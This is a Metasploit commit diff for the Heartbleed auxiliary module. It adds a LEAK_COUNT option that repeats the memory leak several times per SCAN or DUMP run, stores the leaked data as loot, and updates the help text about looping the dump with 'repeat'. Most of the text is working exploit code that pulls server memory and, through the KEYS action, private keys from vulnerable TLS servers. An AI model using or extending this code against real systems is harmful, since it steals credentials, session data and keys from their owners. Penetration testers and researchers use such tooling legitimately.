Land #10680, LEAK_COUNT option for Heartbleed

4.x
William Vu 2018-09-20 20:15:48 -05:00 committed by Metasploit
parent 858b67f943
commit 7ef006fcf9
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
1 changed files with 27 additions and 13 deletions


@ -109,8 +109,12 @@ class MetasploitModule < Msf::Auxiliary
STARTTLS may also be vulnerable. STARTTLS may also be vulnerable.
The module supports several actions, allowing for scanning, dumping of The module supports several actions, allowing for scanning, dumping of
memory contents, and private key recovery. The `repeat` command can be memory contents to loot, and private key recovery.
used to make running the `DUMP` many times more convenient. As in:
The LEAK_COUNT option can be used to specify leaks per SCAN or DUMP.
The repeat command can be used to make running the SCAN or DUMP many
times more powerful. As in:
repeat -t 60 run; sleep 2 repeat -t 60 run; sleep 2
To run every two seconds for one minute. To run every two seconds for one minute.
}, },
@ -145,7 +149,7 @@ class MetasploitModule < Msf::Auxiliary
'Actions' => 'Actions' =>
[ [
['SCAN', {'Description' => 'Check hosts for vulnerability'}], ['SCAN', {'Description' => 'Check hosts for vulnerability'}],
['DUMP', {'Description' => 'Dump memory contents'}], ['DUMP', {'Description' => 'Dump memory contents to loot'}],
['KEYS', {'Description' => 'Recover private keys from memory'}] ['KEYS', {'Description' => 'Recover private keys from memory'}]
], ],
'DefaultAction' => 'SCAN', 'DefaultAction' => 'SCAN',
@ -161,9 +165,10 @@ class MetasploitModule < Msf::Auxiliary
OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]), OptEnum.new('TLS_CALLBACK', [true, 'Protocol to use, "None" to use raw TLS sockets', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP', 'POSTGRES' ]]),
OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]), OptEnum.new('TLS_VERSION', [true, 'TLS/SSL version to use', '1.0', ['SSLv3','1.0', '1.1', '1.2']]),
OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]), OptInt.new('MAX_KEYTRIES', [true, 'Max tries to dump key', 50]),
OptInt.new('STATUS_EVERY', [true, 'How many retries until status', 5]), OptInt.new('STATUS_EVERY', [true, 'How many retries until key dump status', 5]),
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]), OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil]),
OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]) OptInt.new('RESPONSE_TIMEOUT', [true, 'Number of seconds to wait for a server response', 10]),
OptInt.new('LEAK_COUNT', [true, 'Number of times to leak memory per SCAN or DUMP invocation', 1])
]) ])
register_advanced_options( register_advanced_options(
@ -207,10 +212,17 @@ class MetasploitModule < Msf::Auxiliary
# Main method # Main method
def run_host(ip) def run_host(ip)
case action.name case action.name
when 'SCAN' # SCAN and DUMP are similar, but DUMP stores loot
loot_and_report(bleed) when 'SCAN', 'DUMP'
when 'DUMP' # 'Tis but a scratch
loot_and_report(bleed) # Scan & Dump are similar, scan() records results bleeded = ''
1.upto(leak_count) do |count|
vprint_status("Leaking heartbeat response ##{count}")
bleeded << (bleed || '')
end
loot_and_report(bleeded)
when 'KEYS' when 'KEYS'
get_keys get_keys
else else
@ -266,6 +278,10 @@ class MetasploitModule < Msf::Auxiliary
datastore['TLS_CALLBACK'] datastore['TLS_CALLBACK']
end end
def leak_count
datastore['LEAK_COUNT']
end
# #
# TLS Callbacks # TLS Callbacks
# #
@ -493,13 +509,12 @@ class MetasploitModule < Msf::Auxiliary
# Stores received data # Stores received data
def loot_and_report(heartbeat_data) def loot_and_report(heartbeat_data)
if heartbeat_data.nil? || heartbeat_data.empty?
unless heartbeat_data
vprint_error("Looks like there isn't leaked information...") vprint_error("Looks like there isn't leaked information...")
return return
end end
print_good("Heartbeat response with leak") print_good("Heartbeat response with leak, #{heartbeat_data.length} bytes")
report_vuln({ report_vuln({
:host => rhost, :host => rhost,
:port => rport, :port => rport,
@ -541,7 +556,6 @@ class MetasploitModule < Msf::Auxiliary
# Show abbreviated data # Show abbreviated data
vprint_status("Printable info leaked:\n#{abbreviated_data}") vprint_status("Printable info leaked:\n#{abbreviated_data}")
end end
# #